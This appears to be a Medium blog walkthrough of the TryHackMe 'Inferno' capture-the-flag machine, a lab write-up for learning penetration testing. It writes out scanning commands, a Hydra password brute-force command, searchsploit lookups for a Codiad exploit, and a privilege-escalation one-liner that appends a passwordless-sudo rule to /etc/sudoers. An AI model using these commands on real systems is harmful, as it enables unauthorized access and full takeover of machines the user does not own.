TryHackME: Inferno

Today we will take a look at TryHackMe: Inferno. Please try to understand each step and take notes. Try to take quick and careful steps. Because demons will take you out often;)

Information Gathering

> Image analysis

view-source:http://10.10.223.163/1.jpg

First of all, let’s download the image and search

We found the name Dante. We need to save.

Enumeration/Scanning

> Nmap

sudo nmap -sS -sC -sV -oN nmap/initial 10.10.223.163

We found many open ports

I think this is a scam.

> Gobuster

gobuster dir -u http://10.10.223.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

But when we enter the site, we encounter authentication.

Turn on the hydra

Exploitation

Let’s attack with Hydra, but as a username, I will use the admin, root, which is used by default credential next to the dante we found earlier.

Command: hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 10.10.39.231 http-get /i****** -V -I -t 64

And here’s the password we could find if we guessed)

Admin panel

Log in with the same username and password.

> Get reverse shell

The admin panel is codiad. Find exploitation

Command: searchsploit codiad

Command: searchsploit -m multiple/webapps/50474.txt

But I wanted to do by admin panel

> Get reverse shell

If we search inside, we see an interesting .dat file in the downloads folder

Command: ls -la *

I saw it was hex and turned it into text.

> We found the username and password. Try to log in with ssh.

You can race against time while running the machine. Because demons will take you out. Think and decide for him as soon as possible.

Print the commands that are allowed to run as SUDO

Command: sudo -l

We can run “tee” as SUDO.

Command: echo “ALL ALL=NOPASSWD: ALL”|sudo tee -a /etc/sudoers

Privilege escalation

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A short performance story: Scala Native and CArgs

How to Implement Elastic Search With Laravel and Docker (1)

RxJava — Different types of Subjects

CoinTiger Pool Adds LTEX

RCE via war upload in Tomcat using path traversal.

Fix Kodi Interruption Buffering “Please wait” Problem

Fix Kodi Interruption Buffering “Please wait” Problem

AWS And DishTV — Watcho

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe Gallery Writeup

Insomni’hack Teaser 2022 — ExPiltration — Forensics Challenge

[ Hack The Box ] Secret

[EN] TryHackMe 25 Days of Cyber Security: Day 13 Walkthrough